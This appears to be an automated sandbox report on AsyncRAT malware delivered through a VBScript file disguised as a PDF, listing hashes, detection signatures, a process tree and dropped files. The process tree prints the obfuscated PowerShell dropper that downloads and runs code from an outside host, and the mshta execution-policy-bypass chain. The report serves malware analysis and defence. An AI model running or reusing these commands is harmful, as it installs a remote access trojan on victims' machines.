Overview

overview

10

Static

static

ATGSVCN64670.pdf.vbs

windows7_x64

10

ATGSVCN64670.pdf.vbs

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    25-10-2021 06:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ATGSVCN64670.pdf.vbs

  • Size

    741B

  • MD5

    e06db4f9c991c9e5e4df226f567b8a99

  • SHA1

    389820f7a7449f175ee6a5bb2d80004f42613638

  • SHA256

    b1a19a89c4c0b8efa1ebf594bd266b914e3f5621d12edff2fbf4d48bb0e32447

  • SHA512

    bddc4feed5b04b276b9fb0dc85825a1455efb6c297e182680e918523f4bf96a73d990a3dcd61a1a6d6a65bbd5a2e5f974b1d77d27c301ed46e58a54849328a19

Score
10/10
asyncratrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://lacycoligan.com/.Final.txt

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ATGSVCN64670.pdf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow^!loadStri^!g'.replace('^!','n'),[Microsoft.VisualBasic.CallType]::Method,'https://+++++++++++++++++++++.com/.Final.txt'.Replace('+++++++++++++++++++++','lacycoligan'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2216
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\StateWindows.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1320
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\StateWindows.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1944
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C"+":"+"\"+"U"+"s"+"e"+"r"+"s"+"\"+"P"+"u"+"b"+"l"+"i"+"c"+"\StatWindows.ps1'"", 0:close")
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2988
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\StatWindows.ps1'
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3784
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                7⤵
                  PID:3508
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\ProgramData\WindowsHost\StateWindows.vbs"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3920
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\StateWindows.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3404
        • C:\Windows\system32\mshta.exe
          mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C"+":"+"\"+"U"+"s"+"e"+"r"+"s"+"\"+"P"+"u"+"b"+"l"+"i"+"c"+"\StatWindows.ps1'"", 0:close")
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3108
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\StatWindows.ps1'
            4⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2500
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              5⤵
                PID:3124

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\WindowsHost\StateWindows.vbs
        MD5

        4f645bb72091b8b523c9f66dd731f55b

        SHA1

        3459e2d703c5b77f44c294f7a832b79e82b42cf2

        SHA256

        253af609e37ea17dad35177e39673c79dcf9db9d1b00c74dc0eb551d033a2cd4

        SHA512

        4736b4f4e7b7eb91b245348205542c15c401087c60353b2bad185257c6667105f0883141dadf722e63e733fd7039e322eb606ec2e6b29241a0553fc25f23a239

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        MD5

        5f0b198807cbf23cc1fece5d8d37675b

        SHA1

        e8d651684243cf0cee9ec99e1dec4fbf4567b2b8

        SHA256

        524b4481f8783ebf4c58b7d890db6b888a6710c567af2be54af360480b1e4567

        SHA512

        73a04c3c945b4740750eb59857924b7808443b7c8ac9df6e3b2a3cd11840ed836c1196057c09106b3a9bf5da26fef95a16db410aa62810f7706a0b5f2d8cdfe7

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        MD5

        4c2d6d491b28ddc434841dc4aa832e88

        SHA1

        c70b2b3bc3e13b5e6f344587e8e794e54fedb527

        SHA256

        29d9aabc7893ee0009093d54b035b3fcdbd50b28950183899e84715cc9b8213a

        SHA512

        3c639e4b6c82eec7c10d747e637e9d77518a6c5a1fbff8f8bd7e6515a3ad473869643ce1f09ccd6116b9f16450e65dfe5eeba0189641fb2f971b967ef9fa8f00

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        MD5

        6ab5a739a60bd62618e3f5252032fc5a

        SHA1

        4571b08e0ec38953431d54c6bbec943fab64dac8

        SHA256

        f552c2553f07ee42193b023697c204e0151e4d34ab9f513f769a314659cdb8be

        SHA512

        3342c7c074b7479e45e0342f3bc33e8b6a3b5293353b93035b543ec0da9e07a0f628abe67ef23d851fc340f588a728cd553c9ea6de9cbdcea799093e312caf4a

        Download Submit
      • C:\Users\Public\StatWindows.ps1
        MD5

        2bad50d08ebd0e100f9b38035ca602d3

        SHA1

        c6c2069169e943e26467e4c907e6c64374309426

        SHA256

        25b387e66c4f70ffea94492322907a9f6d63d1ceca1bcaf088a00c87179505cc

        SHA512

        d0e8737644d9f03c6ed080827e9f0843ff455b1eb51ffa04e6776f9388bd68ab04d921d97cf3a82f105f05b2b150602fd0385cb15b7a11e67548a57d2e7778f4

        Download Submit
      • C:\Users\Public\StateWindows.bat
        MD5

        e290f4a78263ece746e8d95e202efd99

        SHA1

        2a4e15a8ac70afba5481a1b5839c363713ae473e

        SHA256

        14c1d5b71aa10410556d434fc8cde4dc379192adcbd74c3ca6976f3c9fd64491

        SHA512

        3de2795417f7ae619017e057955d4c55318bf302842755aa159bc9c44a92114f403b593dc3670588b30f76d08ac53cb02b762c2fe70f76bf9df1c22023992213

        Download Submit
      • memory/1320-171-0x0000000000000000-mapping.dmp
        Download
      • memory/1944-178-0x0000000000000000-mapping.dmp
        Download
      • memory/2216-181-0x0000016596520000-0x0000016596522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-182-0x0000016598628000-0x000001659862A000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-125-0x0000016596520000-0x0000016596522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-126-0x00000165B2790000-0x00000165B2791000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2216-127-0x0000016596520000-0x0000016596522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-137-0x0000016598620000-0x0000016598622000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-138-0x0000016598623000-0x0000016598625000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-145-0x0000016598626000-0x0000016598628000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-150-0x0000016596520000-0x0000016596522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-151-0x0000016596520000-0x0000016596522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-123-0x0000016596520000-0x0000016596522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-122-0x0000016596520000-0x0000016596522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-121-0x00000165985F0000-0x00000165985F1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2216-120-0x0000016596520000-0x0000016596522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-116-0x0000016596520000-0x0000016596522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-180-0x0000016596520000-0x0000016596522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-115-0x0000000000000000-mapping.dmp
        Download
      • memory/2216-117-0x0000016596520000-0x0000016596522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-118-0x0000016596520000-0x0000016596522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-124-0x0000016596520000-0x0000016596522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2216-119-0x0000016596520000-0x0000016596522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2500-252-0x000001FC54106000-0x000001FC54108000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2500-241-0x000001FC54103000-0x000001FC54105000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2500-240-0x000001FC54100000-0x000001FC54102000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2500-227-0x0000000000000000-mapping.dmp
        Download
      • memory/2988-183-0x000001C6C3EC8000-0x000001C6C3ED0000-memory.dmp
        Filesize

        32KB

        Download
      • memory/2988-179-0x0000000000000000-mapping.dmp
        Download
      • memory/3108-225-0x0000000000000000-mapping.dmp
        Download
      • memory/3124-253-0x00000000054D0000-0x00000000054D1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3124-244-0x000000000040C6BE-mapping.dmp
        Download
      • memory/3404-224-0x0000000000000000-mapping.dmp
        Download
      • memory/3508-203-0x000000000040C6BE-mapping.dmp
        Download
      • memory/3508-212-0x0000000005110000-0x0000000005111000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3784-186-0x00000278AE940000-0x00000278AE942000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3784-209-0x00000278AE956000-0x00000278AE958000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3784-199-0x00000278AE953000-0x00000278AE955000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3784-198-0x00000278AE950000-0x00000278AE952000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3784-190-0x00000278AE940000-0x00000278AE942000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3784-189-0x00000278AE940000-0x00000278AE942000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3784-188-0x00000278AE940000-0x00000278AE942000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3784-187-0x00000278AE940000-0x00000278AE942000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3784-184-0x0000000000000000-mapping.dmp
        Download